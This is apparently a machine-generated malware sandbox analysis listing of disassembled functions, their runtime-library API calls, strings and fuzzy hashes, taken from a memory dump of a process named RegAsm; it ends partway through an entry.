                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: operator+$Name::operator+
                                                                                                                                                                                                                                            • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                                                                                                                                                                                                            • API String ID: 1198235884-2239912363
                                                                                                                                                                                                                                            • Opcode ID: f8a465d2f7bafde2d392e0162855014c516aac35bc46d2a66b85751117c165f4
                                                                                                                                                                                                                                            • Instruction ID: 8d18a8613de07eef322809ce44fc075c764ca1a0be3f08b7bc39741e1f717549
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f8a465d2f7bafde2d392e0162855014c516aac35bc46d2a66b85751117c165f4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E4156B080860DAFDF24CF54D849BEEBFF6BB09308F518449E9156B261D7B49A48CF80
                                                                                                                                                                                                                                            Function 0054603A Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: NameName::Name::operator+shared_ptr
                                                                                                                                                                                                                                            • String ID: char $int $long $short $unsigned
                                                                                                                                                                                                                                            • API String ID: 3919194733-3894466517
                                                                                                                                                                                                                                            • Opcode ID: ac22c2de9ff5b82de2cc33959c3fe7a74ce7f47ea181e23485cd5f9b71f5ed71
                                                                                                                                                                                                                                            • Instruction ID: 91b9bb37adf611b9ff29385a9645b0e372e3e5711bf790d3efc25e6331a62cc1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ac22c2de9ff5b82de2cc33959c3fe7a74ce7f47ea181e23485cd5f9b71f5ed71
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 41212AB4800249EFCF04CFA4C899BEDBFB4FB16308F10858AE515A7292D7B49648CF42
                                                                                                                                                                                                                                            Function 00540780 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 122COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 005407B7
                                                                                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 005407BF
                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00540848
                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00540873
                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 005408C8
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                            • String ID: csm$uS
                                                                                                                                                                                                                                            • API String ID: 1170836740-2183362451
                                                                                                                                                                                                                                            • Opcode ID: 02026319203c51cbade51a1027ce1deb871be51cd94b8956a2b35aad12176f88
                                                                                                                                                                                                                                            • Instruction ID: f3981e0b31e01d29bf23605c3d6dca02bc642a8a9e891d00e0336b9d76198f78
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 02026319203c51cbade51a1027ce1deb871be51cd94b8956a2b35aad12176f88
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B41B434A002099BCF10DF68C885ADEBFB5FF45318F249059EA18AB392D735EA05CBD1
                                                                                                                                                                                                                                            Function 00549152 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DName::operator+.LIBCMT ref: 00549196
                                                                                                                                                                                                                                            • DName::operator+.LIBCMT ref: 005491A2
                                                                                                                                                                                                                                              • Part of subcall function 0054368A: shared_ptr.LIBCMT ref: 005436A6
                                                                                                                                                                                                                                            • DName::operator+=.LIBCMT ref: 00549260
                                                                                                                                                                                                                                              • Part of subcall function 00547A0C: DName::operator+.LIBCMT ref: 00547A77
                                                                                                                                                                                                                                              • Part of subcall function 00547A0C: DName::operator+.LIBCMT ref: 00547D41
                                                                                                                                                                                                                                              • Part of subcall function 005435B5: DName::operator+.LIBCMT ref: 005435D6
                                                                                                                                                                                                                                            • DName::operator+.LIBCMT ref: 0054921D
                                                                                                                                                                                                                                              • Part of subcall function 005436E2: DName::operator=.LIBVCRUNTIME ref: 00543703
                                                                                                                                                                                                                                            • DName::DName.LIBVCRUNTIME ref: 00549284
                                                                                                                                                                                                                                            • DName::operator+.LIBCMT ref: 00549290
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
                                                                                                                                                                                                                                            • String ID: {for
                                                                                                                                                                                                                                            • API String ID: 2795783184-864106941
                                                                                                                                                                                                                                            • Opcode ID: 0aa44ef509aefa56e5fb15d3ed05f4c0eea1a4ef496b614531e8f3084956be7d
                                                                                                                                                                                                                                            • Instruction ID: 663c8c93333c08a5af8739b08af78ebb7988052c83ac7587712d9fc4e73ecdeb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0aa44ef509aefa56e5fb15d3ed05f4c0eea1a4ef496b614531e8f3084956be7d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 154104B4A04245BFDB14DFA4C89AAEF7FF9BB4A308F004458E186A72A1D7749E44CB54
                                                                                                                                                                                                                                            Function 005447BC Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 005446AF: Replicator::operator[].LIBCMT ref: 0054471B
                                                                                                                                                                                                                                            • DName::DName.LIBVCRUNTIME ref: 00544808
                                                                                                                                                                                                                                            • DName::operator+.LIBCMT ref: 0054484E
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: NameName::Name::operator+Replicator::operator[]
                                                                                                                                                                                                                                            • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                                                                                                                            • API String ID: 583996491-2211150622
                                                                                                                                                                                                                                            • Opcode ID: 3492c8023656a5f6f15862f652738a3cf5ed6a630e02b039b4c5ba4f6ac07d46
                                                                                                                                                                                                                                            • Instruction ID: 0fac9a67e45c6a0c0524414c15fb2ed08adb66b02e5bc4a613800fd37628cf0c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3492c8023656a5f6f15862f652738a3cf5ed6a630e02b039b4c5ba4f6ac07d46
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE317CB0940289EFDB04CF98D8597EEBFF0FB05308F00854AEA95AB261C7749609DF81
                                                                                                                                                                                                                                            Function 00508650 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 338COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: !kcc$7$>
                                                                                                                                                                                                                                            • API String ID: 0-3074482854
                                                                                                                                                                                                                                            • Opcode ID: fb0dfb79801743c21186c78e2cad15b086682c7c1a82ef3855c7c0dfd99f72eb
                                                                                                                                                                                                                                            • Instruction ID: e6b56d590888437b401fbd4ae6fa5c163daf3b81139779553f98c1f5918ce4c2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb0dfb79801743c21186c78e2cad15b086682c7c1a82ef3855c7c0dfd99f72eb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50F14874D04258DFDB14CFA8C890BEEBBB1BF49304F2485A9D845AB381DB359A45CF51
                                                                                                                                                                                                                                            Function 0055B432 Relevance: 10.8, APIs: 7, Instructions: 329COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _strrchr
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3213747228-0
                                                                                                                                                                                                                                            • Opcode ID: 295b9cc952ce91fe88561d2ad070eb42c8d12d78eb2505e1aa2abdc96a2c857d
                                                                                                                                                                                                                                            • Instruction ID: 8340d1de1df966b4bc443f46742991bc8590302f476dcad24303c93d2bfb2e7f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 295b9cc952ce91fe88561d2ad070eb42c8d12d78eb2505e1aa2abdc96a2c857d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9B157729003569FFF258F24CCAABAE7FA5FF99311F144156ED00AB282E3749905C7A1
                                                                                                                                                                                                                                            Function 00418CD0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 207COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _memcpy_s
                                                                                                                                                                                                                                            • String ID: Info$Salt
                                                                                                                                                                                                                                            • API String ID: 2001391462-2052181562
                                                                                                                                                                                                                                            • Opcode ID: 6690312f40285432a8ddfbac61699edc478fc00efab240cd0606b20d90a62bb8
                                                                                                                                                                                                                                            • Instruction ID: a950d269242dfe9dd52c7fcc47e69861c35a5128e8b58a5cbb34649cfbeae689
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6690312f40285432a8ddfbac61699edc478fc00efab240cd0606b20d90a62bb8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8391C8B5E002089FCB18DF95D891AEEBBB5BF58700F20815EE519B7391DB34A941CF54
                                                                                                                                                                                                                                            Function 005449D6 Relevance: 10.7, APIs: 7, Instructions: 151COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DName::operator+.LIBCMT ref: 00544A64
                                                                                                                                                                                                                                            • DName::operator+.LIBCMT ref: 00544AB7
                                                                                                                                                                                                                                              • Part of subcall function 0054368A: shared_ptr.LIBCMT ref: 005436A6
                                                                                                                                                                                                                                              • Part of subcall function 005435B5: DName::operator+.LIBCMT ref: 005435D6
                                                                                                                                                                                                                                            • DName::operator+.LIBCMT ref: 00544AA8
                                                                                                                                                                                                                                            • DName::operator+.LIBCMT ref: 00544B08
                                                                                                                                                                                                                                            • DName::operator+.LIBCMT ref: 00544B15
                                                                                                                                                                                                                                            • DName::operator+.LIBCMT ref: 00544B5C
                                                                                                                                                                                                                                            • DName::operator+.LIBCMT ref: 00544B69
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Name::operator+$shared_ptr
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1037112749-0
                                                                                                                                                                                                                                            • Opcode ID: b9a7eb6a02f97c272ef14c53133defa3641d00bb7b7a4d13cf81fd690010cd6a
                                                                                                                                                                                                                                            • Instruction ID: 5d99feb53ccfbfc570d0b77c02ed575b7953432501de9806d7671a74e92f01aa
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9a7eb6a02f97c272ef14c53133defa3641d00bb7b7a4d13cf81fd690010cd6a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A151A171D4020AABDF18DB94C849EEEBFB9FF48304F044459F501A7290EB709A48CFA4
                                                                                                                                                                                                                                            Function 00566E3A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 140COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • 75R, xrefs: 00566F8F
                                                                                                                                                                                                                                            • .?AVAuthenticatedSymmetricCipher@CryptoPP@@, xrefs: 00566F43
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: EqualOffsetTypeids
                                                                                                                                                                                                                                            • String ID: .?AVAuthenticatedSymmetricCipher@CryptoPP@@$75R
                                                                                                                                                                                                                                            • API String ID: 1707706676-2152600069
                                                                                                                                                                                                                                            • Opcode ID: 2ca317564d3a52bdce74212441e3e6b18e266408b0b4746ca7a4d4689c7ceabc
                                                                                                                                                                                                                                            • Instruction ID: e03f0cb30912456cf73cee95ecc88c3d0b0647114a243d0fcba1ecfcef0bb93b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ca317564d3a52bdce74212441e3e6b18e266408b0b4746ca7a4d4689c7ceabc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F341873990420A9FCF10CFA8E490AAEFFF5FF55310F14498AE851A7255D732AE44CB90
                                                                                                                                                                                                                                            Function 005488CA Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 96COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • UnDecorator::getSignedDimension.LIBCMT ref: 0054891B
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Decorator::getDimensionSigned
                                                                                                                                                                                                                                            • String ID: `template-parameter$uS$void
                                                                                                                                                                                                                                            • API String ID: 2996861206-2986298104
                                                                                                                                                                                                                                            • Opcode ID: dcbca23786ab9ebcca738f5e974f20defe8fbaa0ca7609052ed66dac36af4494
                                                                                                                                                                                                                                            • Instruction ID: 530430bb251fd7e7ca1b2ce5dc86491989f0a149b071517e6f4366dd81a2b71e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dcbca23786ab9ebcca738f5e974f20defe8fbaa0ca7609052ed66dac36af4494
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A31527190420EABDF04DBE4D85ABFEBBF8BB5C308F10441AE601B3191DB749A0C9B65
                                                                                                                                                                                                                                            Function 0055A8F2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,0041C3C8,?,CA1D138C,?,0055AA01,0041C3C8,0053E038,00000000,0041C3C8), ref: 0055A9B3
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                            • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                            • Opcode ID: 0fdcc605303da6b2f7034f1edd11ac72101ec615f719029160a6f8f46c5f4c57
                                                                                                                                                                                                                                            • Instruction ID: da48f7548a0f73b2077f71ef9ff21d7726c303b33cafd8cbef9bf5e1d652bec0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0fdcc605303da6b2f7034f1edd11ac72101ec615f719029160a6f8f46c5f4c57
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB210831A00225FBC7228B64DC64A5A3B78FB527A1F220326EC05A7290D770ED08D6E2
                                                                                                                                                                                                                                            Function 0053F1A4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0053F1AB
                                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0053F1B6
                                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0053F224
                                                                                                                                                                                                                                              • Part of subcall function 0053F307: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0053F31F
                                                                                                                                                                                                                                            • std::locale::_Setgloballocale.LIBCPMT ref: 0053F1D1
                                                                                                                                                                                                                                            • _Yarn.LIBCPMT ref: 0053F1E7
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                            • String ID: uS
                                                                                                                                                                                                                                            • API String ID: 1088826258-336044122
                                                                                                                                                                                                                                            • Opcode ID: 30d08187774148631f3dd7c5042b4ac3f50f1a4c5ff9695420ee58a21d1aa257
                                                                                                                                                                                                                                            • Instruction ID: 5de2392838dceab92e60f7cdfc245ce36761020e89b9f594e1b0e2e664887ed8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30d08187774148631f3dd7c5042b4ac3f50f1a4c5ff9695420ee58a21d1aa257
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F01DF79A005129BDB06EF20D85A97DBFB5FFD4700F144019E81267381CF74AE06DB92
                                                                                                                                                                                                                                            Function 0054F668 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,CA1D138C,?,?,00000000,0056A4F0,000000FF,?,0054F644,?,?,0054F618,00000000), ref: 0054F69D
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0054F6AF
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,0056A4F0,000000FF,?,0054F644,?,?,0054F618,00000000), ref: 0054F6D1
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll$uS
                                                                                                                                                                                                                                            • API String ID: 4061214504-1639456704
                                                                                                                                                                                                                                            • Opcode ID: 0ae593fa9a2cb0efe76a46784ed79c5ef985e7b783321e4dab80a9c5fb622def
                                                                                                                                                                                                                                            • Instruction ID: dc1d690a658764fb77f5f4f7c88622c6a2ef2e4ce2d0e2280e886df1ad3fa834
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ae593fa9a2cb0efe76a46784ed79c5ef985e7b783321e4dab80a9c5fb622def
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE016231A50659EFEB118F58DC09BAEBFB8FB44B15F000626E811E32E0DBB59944CB91
                                                                                                                                                                                                                                            Function 00418600 Relevance: 7.6, APIs: 5, Instructions: 75COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00418612
                                                                                                                                                                                                                                            • int.LIBCPMTD ref: 00418624
                                                                                                                                                                                                                                              • Part of subcall function 0040E500: std::_Lockit::_Lockit.LIBCPMT ref: 0040E516
                                                                                                                                                                                                                                              • Part of subcall function 0040E500: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E540
                                                                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMTD ref: 0041866B
                                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004186E1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3053331623-0
                                                                                                                                                                                                                                            • Opcode ID: fcf074ac198ef22dd4cb04887d15906ab0338ad049432f7b9d5a1a182cf364b9
                                                                                                                                                                                                                                            • Instruction ID: 0199eea585d919c532870c525719b061cd6942339d21c6b0a82242c96965bb99
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fcf074ac198ef22dd4cb04887d15906ab0338ad049432f7b9d5a1a182cf364b9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4431B3B5D00209EFCB04DF95D585AEEBBB5BF48300F108A6AE815B7390DB34AA45CF95
                                                                                                                                                                                                                                            Function 0054E416 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 181COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0054E4B3
                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0054E5BA
                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0054E5CD
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                            • String ID: =T
                                                                                                                                                                                                                                            • API String ID: 885266447-3806340721
                                                                                                                                                                                                                                            • Opcode ID: d822b3af1fe3d9f3b6ced3cd5c1978937d14edb7e4b25b420f3795e4590ff45a
                                                                                                                                                                                                                                            • Instruction ID: 802f42fe8954b042431766edbb863acf8f59caeff2da4b8ffacaa20abaed0416
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d822b3af1fe3d9f3b6ced3cd5c1978937d14edb7e4b25b420f3795e4590ff45a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD513E75A00209AFCF14DF98C886AEEBFB6FB89318F148559E855A7351E230DE41DB60
                                                                                                                                                                                                                                            Function 00432E1D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 141COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __aulldiv
                                                                                                                                                                                                                                            • String ID: 0srs$n{
                                                                                                                                                                                                                                            • API String ID: 3732870572-1103935807
                                                                                                                                                                                                                                            • Opcode ID: 0ed030b0dcefd315c972e79bcdf713e52ba0f97da2de7d73509eee95a73019a2
                                                                                                                                                                                                                                            • Instruction ID: cbed598f6ad0c28982001969e8cd320f226b4311a73310473d2849dad8a66646
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ed030b0dcefd315c972e79bcdf713e52ba0f97da2de7d73509eee95a73019a2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49611970D042289BEB24CF68CC54BDEBBB2BB89305F1081D9D40CB7391DB786A858F94
                                                                                                                                                                                                                                            Function 005446AF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Replicator::operator[].LIBCMT ref: 0054471B
                                                                                                                                                                                                                                            • DName::operator=.LIBVCRUNTIME ref: 005447B0
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Name::operator=Replicator::operator[]
                                                                                                                                                                                                                                            • String ID: GT$GT
                                                                                                                                                                                                                                            • API String ID: 3211817929-2152628013
                                                                                                                                                                                                                                            • Opcode ID: 7b7dd62dbc9dfedf20a5674f537840bd6a9ddecca403dfe298fcd1bb64d7a993
